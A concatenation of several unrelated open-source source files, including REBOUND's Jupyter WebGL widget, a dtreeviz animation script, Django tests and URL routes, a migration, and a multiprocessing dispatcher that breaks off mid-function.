var vertexShader = createShaderFromScript(glr, vertexShaderId, glr.VERTEX_SHADER);
var fragmentShader = createShaderFromScript(glr, fragmentShaderId, glr.FRAGMENT_SHADER);
var program = glr.createProgram();
// attach the shaders.
glr.attachShader(program, vertexShader);
glr.attachShader(program, fragmentShader);
// link the program.
glr.linkProgram(program);
// Check if it linked.
var success = glr.getProgramParameter(program, glr.LINK_STATUS);
if (!success) {
// something went wrong with the link
throw ("program filed to link:" + glr.getProgramInfoLog (program));
}
return program;
}
function quat2mat(A,mat){
var xx = A.x*A.x; var xy = A.x*A.y; var xz = A.x*A.z;
var xw = A.x*A.w; var yy = A.y*A.y; var yz = A.y*A.z;
var yw = A.y*A.w; var zz = A.z*A.z; var zw = A.z*A.w;
mat[0] = 1.-2.*(yy+zz);
mat[1] = 2.*(xy-zw);
mat[2] = 2.*(xz+yw);
mat[4] = 2.*(xy+zw);
mat[5] = 1.-2.*(xx+zz);
mat[6] = 2.*(yz-xw);
mat[8] = 2.*(xz-yw);
mat[9] = 2.*(yz+xw);
mat[10]= 1.-2.*(xx+yy);
mat[3] = mat[7] = mat[11] = mat[12] = mat[13] = mat[14] = 0.; mat[15]= 1.;
}
function multvec(A, B, vecr){
var mat = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
quat2mat(A,mat);
vecr[0] = mat[0]*B[0] + mat[1]*B[1] + mat[2]*B[2];
vecr[1] = mat[4]*B[0] + mat[5]*B[1] + mat[6]*B[2];
vecr[2] = mat[8]*B[0] + mat[9]*B[1] + mat[10]*B[2];
}
function mattransp(mat){
var matt = [
mat[0], mat[4], mat[8], mat[12],
mat[1], mat[5], mat[9], mat[13],
mat[2], mat[6], mat[10], mat[14],
mat[3], mat[7], mat[11], mat[15]];
return matt;
}
function conjugate(quat){
var cquat = {x:-quat.x, y:-quat.y, z:-quat.z, w:quat.w};
return cquat;
}
function mult(A, B){
var mquat = { x: A.w*B.x + A.x*B.w + A.y*B.z - A.z*B.y,
y: A.w*B.y - A.x*B.z + A.y*B.w + A.z*B.x,
z: A.w*B.z + A.x*B.y - A.y*B.x + A.z*B.w,
w: A.w*B.w - A.x*B.x - A.y*B.y - A.z*B.z};
return mquat;
}
function normalize(quat){
var L = Math.sqrt(quat.x*quat.x + quat.y*quat.y + quat.z*quat.z + quat.w*quat.w);
var nquat = {x:quat.x/L, y:quat.y/L, z:quat.z/L, w:quat.w/L};
return nquat;
}
function matortho(mat, l, r, b, t, n, f){
mat[0] = 2./(r-l); mat[1] = 0.; mat[2] = 0.; mat[3] = -(r+l)/(r-l);
mat[4] = 0.; mat[5] = 2./(t-b); mat[6] = 0.; mat[7] = -(t+b)/(t-b);
mat[8] = 0.; mat[9] = 0.; mat[10] = -2./(f-n); mat[11] = -(f+n)/(f-n);
mat[12] = 0.; mat[13] = 0.; mat[14] = 0.; mat[15] = 1.;
}
function matmult(A,B,C){
for(i=0;i<4;i++){
for(j=0;j<4;j++){
C[i+4*j] = 0.;
for(k=0;k<4;k++){
C[i+4*j] += A[k+4*j]*B[i+4*k];
}}}
}
function startGL(reboundView) {
var canvas = document.getElementById("reboundcanvas-"+reboundView.cid);
if (!canvas){
reboundView.startCount = reboundView.startCount+1;
if (reboundView.startCount>1000){
console.log("Cannot find element.");
}else{
setTimeout(function(){ startGL(reboundView); }, 10);
}
return;
}
var rect = canvas.getBoundingClientRect()
reboundView.ratio = rect.width/rect.height;
reboundView.view = normalize({x:reboundView.orientation[0], y:reboundView.orientation[1], z:reboundView.orientation[2], w:reboundView.orientation[3]});
canvas.addEventListener('mousedown', function() {
reboundView.mouseDown=1;
}, false);
canvas.addEventListener('mouseup', function() {
reboundView.mouseDown=0;
}, false);
canvas.addEventListener('mouseleave', function() {
reboundView.mouseDown=0;
}, false);
canvas.addEventListener('mousemove', function(evt) {
var rect = canvas.getBoundingClientRect()
if (reboundView.mouseDown==1){
reboundView.mouseDown = 2;
reboundView.mouse_x = evt.clientX-rect.left;
reboundView.mouse_y = evt.clientY-rect.top;
return;
}else if (reboundView.mouseDown==2){
var width = rect.width;
var height = rect.height;
var dx = 3.*(evt.clientX-rect.left-reboundView.mouse_x)/width;
var dy = 3.*(evt.clientY-rect.top-reboundView.mouse_y)/height;
reboundView.mouse_x = evt.clientX-rect.left;
reboundView.mouse_y = evt.clientY-rect.top;
if (evt.shiftKey){
reboundView.scale *= (1.+dx+dy);
}else{
var inv = conjugate(reboundView.view);
var up = [0.,1.,0.];
var right = [1.,0.,0.];
var inv_up = [0.,0.,0.];
var inv_right = [0.,0.,0.];
multvec(inv, right, inv_right);
multvec(inv, up, inv_up);
var sin_dy = Math.sin(dy);
var rot_dy = {x:inv_right[0]*sin_dy, y:inv_right[1]*sin_dy, z:inv_right[2]*sin_dy, w:Math.cos(dy)};
reboundView.view = mult(reboundView.view, normalize(rot_dy));
var sin_dx = Math.sin(dx);
var rot_dx = {x:inv_up[0]*sin_dx, y:inv_up[1]*sin_dx, z:inv_up[2]*sin_dx, w:Math.cos(dx)};
reboundView.view = normalize(mult(reboundView.view, normalize(rot_dx)));
}
drawGL(reboundView);
}
}, false);
reboundView.gl = canvas.getContext("webgl")||canvas.getContext("experimental-webgl");
if (!reboundView.gl) {
alert("Unable to initialize WebGL. Your browser may not support it.");
return;
}
var gl = reboundView.gl
gl.enable(gl.BLEND);
gl.blendFunc(gl.SRC_ALPHA, gl.ONE_MINUS_SRC_ALPHA);
reboundView.orbit_shader_program = createProgramFromScripts(gl,"orbit_shader-vs","orbit_shader-fs");
reboundView.point_shader_program = createProgramFromScripts(gl,"point_shader-vs","point_shader-fs");
var lintwopi = new Float32Array(500);
for(i=0;i<500;i++){
lintwopi[i] = 2.*Math.PI/500.*i;
}
reboundView.orbit_lintwopi_buffer = gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.orbit_lintwopi_buffer);
gl.bufferData(gl.ARRAY_BUFFER, 4*500, gl.STATIC_DRAW);
gl.bufferSubData(gl.ARRAY_BUFFER, 0, lintwopi)
reboundView.orbit_shader_mvp_location = gl.getUniformLocation(reboundView.orbit_shader_program,"mvp");
reboundView.orbit_shader_focus_location = gl.getUniformLocation(reboundView.orbit_shader_program,"focus");
reboundView.orbit_shader_aef_location = gl.getUniformLocation(reboundView.orbit_shader_program,"aef");
reboundView.orbit_shader_omegaOmegainc_location = gl.getUniformLocation(reboundView.orbit_shader_program,"omegaOmegainc");
reboundView.particle_data_buffer = gl.createBuffer();
gl.useProgram(reboundView.point_shader_program);
reboundView.point_shader_mvp_location = gl.getUniformLocation(reboundView.point_shader_program,"mvp");
updateRenderData(reboundView);
gl.clearColor(0.0, 0.0, 0.0, 1.0);
gl.clear(gl.COLOR_BUFFER_BIT);
drawGL(reboundView);
}
function updateRenderData(reboundView){
var overlay = document.getElementById("reboundoverlay-"+reboundView.cid);
overlay.innerHTML = reboundView.model.get("overlay");
var previousN = reboundView.N;
reboundView.N = reboundView.model.get("N");
reboundView.t = reboundView.model.get("t");
reboundView.particle_data = reboundView.model.get('particle_data');
if (reboundView.orbits){
reboundView.orbit_data = reboundView.model.get('orbit_data');
}
var gl = reboundView.gl
if (reboundView.N>0){
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.particle_data_buffer);
gl.bufferData(gl.ARRAY_BUFFER, reboundView.N*7*4, gl.DYNAMIC_DRAW);
gl.bufferSubData(gl.ARRAY_BUFFER, 0, reboundView.particle_data)
}
}
function drawGL(reboundView) {
if (!reboundView.gl){
return;
}
// Cleanup
var gl = reboundView.gl
gl.clearColor(0.0, 0.0, 0.0, 1.0);
gl.clear(gl.COLOR_BUFFER_BIT);
// Draw
gl.useProgram(reboundView.point_shader_program);
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.particle_data_buffer);
var pvp = gl.getAttribLocation(reboundView.point_shader_program,"vp");
gl.enableVertexAttribArray(pvp);
gl.vertexAttribPointer(pvp, 3, gl.FLOAT, 0, 4*7,0); // 4 = size of float
var projection = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
if (reboundView.ratio>=1.){
matortho(projection,
-1.6*reboundView.scale, 1.6*reboundView.scale,
-1.6/reboundView.ratio*reboundView.scale, 1.6/reboundView.ratio*reboundView.scale,
-2.5*reboundView.scale, 2.5*reboundView.scale);
}else{
matortho(projection,
-1.6*reboundView.ratio*reboundView.scale, 1.6*reboundView.ratio*reboundView.scale,
-1.6*reboundView.scale, 1.6*reboundView.scale,
-2.5*reboundView.scale, 2.5*reboundView.scale);
}
var view = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
quat2mat(reboundView.view,view);
var mvp = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
matmult(projection,view,mvp);
gl.uniformMatrix4fv(reboundView.point_shader_mvp_location,false,mattransp(mvp));
gl.drawArrays(gl.POINTS,0,reboundView.N);
if (reboundView.orbits){
gl.useProgram(reboundView.orbit_shader_program);
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.orbit_lintwopi_buffer);
var ltp = gl.getAttribLocation(reboundView.orbit_shader_program,"lintwopi");
gl.enableVertexAttribArray(ltp);
gl.vertexAttribPointer(ltp, 1, gl.FLOAT, 0, 0,0); // 4 = size of float
gl.uniformMatrix4fv(reboundView.orbit_shader_mvp_location,false,mattransp(mvp));
// Need to do this one by one
// because WebGL is not supporting
// instancing:
for(i=0;i<reboundView.N-1;i++){
var focus = new Float32Array(reboundView.orbit_data.buffer,4*9*i,3);
gl.uniform3fv(reboundView.orbit_shader_focus_location,focus);
var aef = new Float32Array(reboundView.orbit_data.buffer,4*(9*i+3),3);
gl.uniform3fv(reboundView.orbit_shader_aef_location,aef);
var omegaOmegainc = new Float32Array(reboundView.orbit_data.buffer,4*(9*i+6),3);
gl.uniform3fv(reboundView.orbit_shader_omegaOmegainc_location,omegaOmegainc);
gl.drawArrays(gl.LINE_STRIP,0,500);
}
}
}
require.undef('rebound');
define('rebound', ["@jupyter-widgets/base"], function(widgets) {
var ReboundView = widgets.DOMWidgetView.extend({
render: function() {
this.el.innerHTML = '<span style="display: inline-block; position: relative;" width="'+this.model.get("width")+'" height="'+this.model.get("height")+'"><canvas style="border: none;" id="reboundcanvas-'+this.cid+'" width="'+this.model.get("width")+'" height="'+this.model.get("height")+'"></canvas><span style="position: absolute; color: #FFF; pointer-events:none; bottom:5px; right:0px; padding-right:5px; font-family: monospace;" id="reboundoverlay-'+this.cid+'">REBOUND</span></span>';
this.model.on('change:t', this.trigger_refresh, this);
this.model.on('change:count', this.trigger_refresh, this);
this.model.on('change:screenshotcount', this.take_screenshot, this);
this.startCount = 0;
this.gl = null;
// Only copy those once
this.scale = this.model.get("scale");
this.width = this.model.get("width");
this.height = this.model.get("height");
this.orbits = this.model.get("orbits");
this.orientation = this.model.get("orientation");
startGL(this);
},
take_screenshot: function() {
drawGL(this);
var canvas = document.getElementById("reboundcanvas-"+this.cid);
var img = canvas.toDataURL("image/png");
this.model.set("screenshot",img, {updated_view: this});
this.touch();
},
trigger_refresh: function() {
updateRenderData(this);
drawGL(this);
},
});
return {
ReboundView: ReboundView
};
});
</script>
"""
import ipywidgets
ipywidgets_major_version = int((ipywidgets.__version__).split(".")[0])
if ipywidgets_major_version<7:
js_code = js_code.replace("@jupyter-widgets/base", "jupyter-js-widgets")
js_code = js_code.replace(".cid", ".id")
from ipywidgets import DOMWidget
import traitlets
import math
import base64
import sys
from ctypes import c_float, byref, create_string_buffer, c_int, c_char, pointer
from . import clibrebound
def savescreenshot(change):
if len(change["new"]) and change["type"] =="change":
w = change["owner"]
bd = base64.b64decode(change["new"].split(",")[-1])
if sys.version_info[0] < 3:
with open(w.screenshotprefix+"%05d.png"%w.screenshotcountall, 'w') as f:
f.write(bd)
else:
with open(w.screenshotprefix+"%05d.png"%w.screenshotcountall, 'bw') as f:
f.write(bd)
w.screenshotcountall += 1
if len(w.times)>w.screenshotcount:
nexttime = w.times[w.screenshotcount]
if w.archive:
sim = w.archive.getSimulation(w.times[w.screenshotcount],mode=w.mode)
w.refresh(pointer(sim))
else:
w.simp.contents.integrate(w.times[w.screenshotcount])
w.screenshotcount += 1
else:
w.unobserve(savescreenshot)
w.times = None
w.screenshotprefix = None
class Widget(DOMWidget):
_view_name = traitlets.Unicode('ReboundView').tag(sync=True)
_view_module = traitlets.Unicode('rebound').tag(sync=True)
count = traitlets.Int(0).tag(sync=True)
screenshotcount = traitlets.Int(0).tag(sync=True)
t = traitlets.Float().tag(sync=True)
N = traitlets.Int().tag(sync=True)
overlay = traitlets.Unicode('REB WIdund').tag(sync=True)
width = traitlets.Float().tag(sync=True)
height = traitlets.Float().tag(sync=True)
scale = traitlets.Float().tag(sync=True)
particle_data = traitlets.CBytes(allow_none=True).tag(sync=True)
orbit_data = traitlets.CBytes(allow_none=True).tag(sync=True)
orientation = traitlets.Tuple().tag(sync=True)
orbits = traitlets.Int().tag(sync=True)
screenshot = traitlets.Unicode().tag(sync=True)
def __init__(self,simulation,size=(200,200),orientation=(0.,0.,0.,1.),scale=None,autorefresh=True,orbits=True, overlay=True):
"""
Initializes a Widget.
Widgets provide real-time 3D interactive visualizations for REBOUND simulations
within Jupyter Notebooks. To use widgets, the ipywidgets package needs to be installed
and enabled in your Jupyter notebook server.
Parameters
----------
size : (int, int), optional
Specify the size of the widget in pixels. The default is 200 times 200 pixels.
orientation : (float, float, float, float), optional
Specify the initial orientation of the view. The four floats correspond to the
x, y, z, and w components of a quaternion. The quaternion will be normalized.
scale : float, optional
Set the initial scale of the view. If not set, the widget will determine the
scale automatically based on current particle positions.
autorefresh : bool, optional
The default value if True. The view is updated whenever a particle is added,
removed and every 100th of a second while a simulation is running. If set
to False, then the user needs to manually call the refresh() function on the
widget. This might be useful if performance is an issue.
orbits : bool, optional
The default value for this is True and the widget will draw the instantaneous
orbits of the particles. For simulations in which particles are not on
Keplerian orbits, the orbits shown will not be accurate.
overlay : string, optional
Change the default text overlay. Set to None to hide all text.
"""
self.screenshotcountall = 0
self.width, self.height = size
self.t, self.N = simulation.t, simulation.N
self.orientation = orientation
self.autorefresh = autorefresh
self.orbits = orbits
self.useroverlay = overlay
self.simp = pointer(simulation)
clibrebound.reb_display_copy_data.restype = c_int
if scale is None:
self.scale = simulation.display_data.contents.scale
else:
self.scale = scale
self.count += 1
super(Widget, self).__init__()
def refresh(self, simp=None, isauto=0):
"""
Manually refreshes a widget.
Note that this function can also be called using the wrapper function of
the Simulation object: sim.refreshWidgets().
"""
if simp==None:
simp = self.simp
if self.autorefresh==0 and isauto==1:
return
sim = simp.contents
size_changed = clibrebound.reb_display_copy_data(simp)
clibrebound.reb_display_prepare_data(simp,c_int(self.orbits))
if sim.N>0:
self.particle_data = (c_char * (4*7*sim.N)).from_address(sim.display_data.contents.particle_data).raw
if self.orbits:
self.orbit_data = (c_char * (4*9*(sim.N-1))).from_address(sim.display_data.contents.orbit_data).raw
if size_changed:
#TODO: Implement better GPU size change
pass
if self.useroverlay==True:
self.overlay = "REBOUND (%s), N=%d, t=%g"%(sim.integrator,sim.N,sim.t)
elif self.useroverlay==None or self.useroverlay==False:
self.overlay = ""
else:
self.overlay = self.useroverlay + ", N=%d, t=%g"%(sim.N,sim.t)
self.N = sim.N
self.t = sim.t
self.count += 1
def takeScreenshot(self, times=None, prefix="./screenshot", resetCounter=False, archive=None,mode="snapshot"):
"""
Take one or more screenshots of the widget and save the images to a file.
The images can be used to create a video.
This function cannot be called multiple times within one cell.
Note: this is a new feature and might not work on all systems.
It was tested on python 2.7.10 and 3.5.2 on MacOSX.
Parameters
----------
times : (float, list), optional
If this argument is not given a screenshot of the widget will be made
as it is (without integrating the simulation). If a float is given, then the
simulation will be integrated to that time and then a screenshot will
be taken. If a list of floats is given, the simulation will be integrated
to each time specified in the array. A separate screenshot for
each time will be saved.
prefix : (str), optional
This string will be part of the output filename for each image.
Follow by a five digit integer and the suffix .png. By default the
prefix is './screenshot' which outputs images in the current
directory with the filnames screenshot00000.png, screenshot00001.png...
Note that the prefix can include a directory.
resetCounter : (bool), optional
Resets the output counter to 0.
archive : (rebound.SimulationArchive), optional
Use a REBOUND SimulationArchive. Thus, instead of integratating the
Simulation from the current time, it will use the SimulationArchive
to load a snapshot. See examples for usage.
mode : (string), optional
Mode to use when querying the SimulationArchive. See SimulationArchive
documentation for details. By default the value is "snapshot".
Examples
--------
First, create a simulation and widget. All of the following can go in
one cell.
>>> sim = rebound.Simulation()
>>> sim.add(m=1.)
>>> sim.add(m=1.e-3,x=1.,vy=1.)
>>> w = sim.getWidget()
>>> w
The widget should show up. To take a screenshot, simply call
>>> w.takeScreenshot()
A new file with the name screenshot00000.png will appear in the
current directory.
Note that the takeScreenshot command needs to be in a separate cell,
i.e. after you see the widget.
You can pass an array of times to the function. This allows you to
take multiple screenshots, for example to create a movie,
>>> times = [0,10,100]
>>> w.takeScreenshot(times)
"""
self.archive = archive
if resetCounter:
self.screenshotcountall = 0
self.screenshotprefix = prefix
self.screenshotcount = 0
self.overlay = "REBOUND"
self.screenshot = ""
if archive is None:
if times is None:
times = self.simp.contents.t
try:
# List
len(times)
except:
# Float:
times = [times]
self.times = times
self.observe(savescreenshot,names="screenshot")
self.simp.contents.integrate(times[0])
self.screenshotcount += 1 # triggers first screenshot
else:
if times is None:
raise ValueError("Need times argument for archive mode.")
try:
len(times)
except:
raise ValueError("Need a list of times for archive mode.")
self.times = times
self.mode = mode
self.observe(savescreenshot,names="screenshot")
sim = archive.getSimulation(times[0],mode=mode)
self.refresh(pointer(sim))
self.screenshotcount += 1 # triggers first screenshot
@staticmethod
def getClientCode():
return shader_code + js_code
|
dtamayo/rebound
|
rebound/widget.py
|
Python
|
gpl-3.0
| 25,951
|
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from PIL import Image as PIL_Image
import glob
import cairosvg # must pip install
from dtreeviz.trees import *
df_cars = pd.read_csv("data/cars.csv")
X = df_cars.drop('MPG', axis=1)
y = df_cars['MPG']
features = [2, 1]
X = X.values[:,features]
max_depth = 4
figsize = (6,5)
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, projection='3d')
# start topdown view
t = rtreeviz_bivar_3D(ax,
X, y,
max_depth=max_depth,
feature_names=['Vehicle Weight', 'Horse Power'],
target_name='MPG',
fontsize=14,
elev=90,
azim=0,
dist=7,
show={'splits'})
#plt.show()
n = 50
elev_range = np.arange(90, 10, -(90-10)/n)
azim_range = np.arange(0, 25, (22-0)/n)
i = 0
# pause on heatmap topview
for j in range(10):
ax.elev = 90
ax.azim = 0
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
# fly through
for elev, azim in zip(elev_range, azim_range):
ax.elev = elev
ax.azim = azim
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
# fly back
for elev, azim in reversed(list(zip(elev_range, azim_range))):
ax.elev = elev
ax.azim = azim
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
n_images = i
plt.close()
images = [PIL_Image.open(image) for image in [f'/tmp/cars-frame-{i:02d}.png' for i in range(n_images)]]
images[0].save('/tmp/cars-animation.gif',
save_all=True,
append_images=images[1:],
duration=100,
loop=0)
|
parrt/AniML
|
testing/animate_rtree_bivar_3D.py
|
Python
|
bsd-3-clause
| 1,917
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import pytest
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from django.shortcuts import resolve_url
from shoop.testing.factories import get_default_shop
from shoop.testing.soup_utils import extract_form_fields
from shoop_tests.utils import SmartClient
@pytest.mark.django_db
def test_new_user_information_edit():
client = SmartClient()
get_default_shop()
# create new user
user_password = "niilo"
user = get_user_model().objects.create_user(
username="Niilo_Nyyppa",
email="niilo@example.shoop.io",
password=user_password,
first_name="Niilo",
last_name="Nyyppä",
)
client.login(username=user.username, password=user_password)
# make sure all information matches in form
customer_edit_url = reverse("shoop:customer_edit")
soup = client.soup(customer_edit_url)
assert soup.find(attrs={"name": "contact-email"})["value"] == user.email
assert soup.find(attrs={"name": "contact-name"})["value"] == user.get_full_name()
# Test POSTing
form = extract_form_fields(soup)
new_email = "nyyppa@example.shoop.io"
form["contact-email"] = new_email
form["contact-country"] = "FI"
for prefix in ("billing", "shipping"):
form["%s-city" % prefix] = "test-city"
form["%s-email" % prefix] = new_email
form["%s-street" % prefix] = "test-street"
form["%s-country" % prefix] = "FI"
response, soup = client.response_and_soup(customer_edit_url, form, "post")
assert response.status_code == 302
assert get_user_model().objects.get(pk=user.pk).email == new_email
@pytest.mark.django_db
def test_customer_edit_redirects_to_login_if_not_logged_in():
get_default_shop() # Front middleware needs a Shop to exists
response = SmartClient().get(reverse("shoop:customer_edit"), follow=False)
assert response.status_code == 302 # Redirection ("Found")
assert resolve_url(settings.LOGIN_URL) in response.url
|
akx/shoop
|
shoop_tests/front/test_customer_information.py
|
Python
|
agpl-3.0
| 2,322
|
required_modules = 'core:em:algebra:atom:statistics:multifit'
required_dependencies = 'Boost.ProgramOptions:Boost.FileSystem:libTau'
optional_dependencies = ''
|
shanot/imp
|
modules/cnmultifit/dependencies.py
|
Python
|
gpl-3.0
| 160
|
"""
Helper functions that are only used in tests.
"""
import os
import re
from io import open
from six import iteritems
from coursera.define import IN_MEMORY_MARKER
from coursera.utils import BeautifulSoup
def slurp_fixture(path):
return open(os.path.join(os.path.dirname(__file__),
"fixtures", path), encoding='utf8').read()
def links_to_plain_text(links):
"""
Converts extracted links into text and cleans up extra whitespace. Only HTML
sections are converted. This is a helper to be used in tests.
@param links: Links obtained from such methods as extract_links_from_peer_assignment.
@type links: @see CourseraOnDemand._extract_links_from_text
@return: HTML converted to plain text with extra space removed.
@rtype: str
"""
result = []
for filetype, contents in iteritems(links):
if filetype != 'html':
continue
for content, _prefix in contents:
if content.startswith(IN_MEMORY_MARKER):
content = content[len(IN_MEMORY_MARKER):]
soup = BeautifulSoup(content)
[script.extract() for script in soup(["script", "style"])]
text = re.sub(r'[ \t\r\n]+', ' ', soup.get_text()).strip()
result.append(text)
return ''.join(result)
|
coursera-dl/coursera
|
coursera/test/utils.py
|
Python
|
lgpl-3.0
| 1,315
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [("podcasts", "0030_ordered_episode")]
operations = [
migrations.AddField(
model_name="podcast",
name="max_episode_order",
field=models.PositiveIntegerField(default=None, null=True),
preserve_default=True,
)
]
|
gpodder/mygpo
|
mygpo/podcasts/migrations/0031_podcast_max_episode_order.py
|
Python
|
agpl-3.0
| 409
|
from django.conf.urls import url
from projects.comments.views import CommentAdd, CommentEdit, CommentDelete
urlpatterns = [
# Create new comment
url(
r'^\/new',
CommentAdd.as_view(),
name='comment_add'
),
# Edit a specific comment
url(
r'^\/(?P<pk>\d+)/edit$',
CommentEdit.as_view(),
name='comment_edit'
),
# Delete a specific comment
url(
r'^\/(?P<pk>\d+)/delete$',
CommentDelete.as_view(),
name='comment_delete'
),
]
|
zurfyx/simple
|
simple/projects/comments/urls.py
|
Python
|
mit
| 531
|
import functools
import time
import traceback
from multiprocessing.util import Finalize
from threading import Event, RLock, Thread, current_thread
from pymp import logger, trace_function
from pymp.messages import DispatcherState, Request, Response, ProxyHandle, generate_id
from collections import deque
class State(object):
INIT, STARTUP, RUNNING, SHUTDOWN, TERMINATED = range(5)
class Dispatcher(object):
PREFIX = '#'
EXPOSED = '_dispatch_'
SPIN_TIME = 0.01
_dispatch_ = ['del_proxy', 'new_proxy']
@trace_function
def __init__(self, conn):
self._state = State.INIT
self._lock = RLock() # protects internal methods
self._queue = deque()
self._pending = dict() # id => Event or Response
self._provided_classes = dict() # string => (Class, callable)
self._consumed_classes = dict() # Class => Class
self._objects = dict()
self._thread = Thread(target=self._run, args=(conn,))
self._thread.daemon = True
self._thread.start()
# We register with multiprocessing to prevent bugs related to the
# order of execution of atexit functions & multiprocessing's join's
Finalize(self, self._atexit, exitpriority=100)
def get_state(self):
return self._state
def set_state(self, state):
with self._lock:
if state > self.state:
self._state = state
self._queue.append(DispatcherState(state)) # head of line
logger.info("Changing state to %d" % state)
elif state == self.state:
pass
else:
raise ValueError('Invalid state progression')
state = property(get_state, set_state)
@trace_function
def _atexit(self):
self.shutdown()
@trace_function
def __del__(self):
if self.alive():
self.shutdown()
self._thread.join()
self._objects.clear()
@trace_function
def provide(self, proxy_class, generator=None, name=None):
"""
Registers a class that will be provided by this dispatcher
If present, a generator will be used in lieu of using a the provided
class's default constructor.
"""
if not name:
name = proxy_class.__name__
with self._lock:
if name in self._provided_classes:
raise NameError("The name '%s' is already in use" % name)
self._provided_classes[name] = (proxy_class, generator)
@trace_function
def consume(self, name, proxy_client=None):
if hasattr(name, '__name__'):
name = name.__name__
with self._lock:
if hasattr(self, name):
raise NameError("The name '%s' is already in use" % name)
self._consumed_classes[name] = proxy_client or Proxy
def create_instance(*args, **kwargs):
new_proxy_args = (name, args, kwargs)
return self.call('#new_proxy', new_proxy_args)
setattr(self, name, create_instance)
def alive(self):
return self.state in (State.STARTUP, State.RUNNING, State.SHUTDOWN)
@trace_function
def call(self, function, args=[], kwargs={}, proxy_id=None, wait=True):
# Step 1: Send Request
request = Request(generate_id(), proxy_id, function, args, kwargs)
if wait:
event = Event()
with self._lock:
self._pending[request.id] = event
self._queue.appendleft(request)
# Step 2: Wait for Response
if wait:
event.wait()
else:
return
# Step 3: Process Response
with self._lock:
response = self._pending.pop(request.id, None)
if not isinstance(response, Response):
raise RuntimeError('Dispatcher stored invalid response')
elif response.exception:
raise response.exception
elif isinstance(response.return_value, ProxyHandle):
proxy_handle = response.return_value
try:
proxy_class = self._consumed_classes[proxy_handle.obj_type]
except KeyError:
logger.info("Recieved proxy_class for unexpected type %s" % proxy_handle.obj_type)
else:
return proxy_class(self, proxy_handle.id, proxy_handle.exposed)
else:
return response.return_value
@trace_function
def start(self):
if self.state is State.INIT:
self.state = State.STARTUP
if self.state is State.STARTUP:
while self.state is State.STARTUP:
time.sleep(self.SPIN_TIME)
@trace_function
def shutdown(self):
if self.state in (State.INIT, State.STARTUP, State.RUNNING):
self.state = State.SHUTDOWN
@trace_function
def _run(self, conn):
while self.state is State.INIT:
time.sleep(self.SPIN_TIME) # wait for the constructor to catch up
while self.state in (State.STARTUP, State.RUNNING):
self._write_once(conn)
self._read_once(conn, timeout=self.SPIN_TIME)
while len(self._queue) > 0:
self._write_once(conn) # send shutdown message if needed
self.state = State.TERMINATED
conn.close()
@trace_function
def join(self):
self._thread.join()
@trace_function
def new_proxy(self, name, args, kwargs):
with self._lock:
if name not in self._provided_classes:
raise NameError("%s does not name a provided class" % name)
source_class, generator = self._provided_classes[name]
if not generator:
generator = source_class
obj = generator(*args, **kwargs)
obj_id = id(obj)
obj_store, refcount = self._objects.get(obj_id, (obj, 0))
assert obj is obj_store, "Different objects returned for the same key"
self._objects[obj_id] = (obj, refcount + 1)
exposed = self._exposed_functions(obj)
return ProxyHandle(obj_id, name, exposed)
@trace_function
def del_proxy(self, proxy_id):
"""
Called by clients to signify when they no longer need a proxy
See: DefaultProxy.__del__
"""
with self._lock:
obj, refcount = self._objects.get(proxy_id, (None, 0))
if refcount <= 0:
logger.warn("Error destructing object %s, not found" % str(proxy_id))
elif refcount == 1:
del self._objects[proxy_id]
else:
self._objects[proxy_id] = (obj, refcount - 1)
def _write_once(self, conn):
if not self.alive():
return
try:
msg = self._queue.pop()
except IndexError:
return
try:
if isinstance(msg, DispatcherState) or self.state is State.RUNNING:
conn.send(msg)
else:
logger.info("Skipping outgoing message %s" % repr(msg))
except IOError:
self.state = State.TERMINATED
except Exception as exception:
# Most likely a PicklingError
if hasattr(msg, 'id'):
response = Response(msg.id, exception, None)
self._process_response(response)
def _read_once(self, conn, timeout=0):
if not self.alive() or not conn.poll(timeout):
return
try:
msg = conn.recv()
except EOFError:
self.state = State.TERMINATED
if isinstance(msg, Request) and self.state is State.RUNNING:
response = self._process_request(msg)
if response:
self._queue.appendleft(response)
elif isinstance(msg, Response) and self.state is State.RUNNING:
self._process_response(msg)
elif isinstance(msg, DispatcherState):
if self.state is State.STARTUP and msg.state is State.STARTUP:
self.state = State.RUNNING
elif msg.state is State.SHUTDOWN:
self.state = msg.state
else:
logger.info("Skipping incoming message %s" % repr(msg))
return True
@trace_function
def _exposed_functions(self, obj):
exposed = getattr(obj, self.EXPOSED, None)
if exposed is None:
exposed = []
for name in dir(obj): # TODO: Not use dir
attribute = getattr(obj, name)
if callable(attribute) and not name.startswith('_'):
exposed.append(name)
setattr(obj, self.EXPOSED, exposed)
return exposed
@trace_function
def _callmethod(self, obj, fname, args, kwargs):
if fname in self._exposed_functions(obj):
function = getattr(obj, fname)
return function(*args, **kwargs)
else:
raise AttributeError("%s does not have an exposed method %s" % (repr(obj), fname))
@trace_function
def _process_request(self, request):
exception = None
fname = request.function
if fname.startswith(self.PREFIX):
obj = self # invoke methods on dispatcher
fname = fname[1:] # strip prefix
else:
with self._lock:
try:
obj, refcount = self._objects[request.proxy_id]
except KeyError:
exception = RuntimeError("No object found")
return Response(request.id, exception, None)
try:
value = self._callmethod(obj, fname, request.args, request.kwargs)
except Exception as exception:
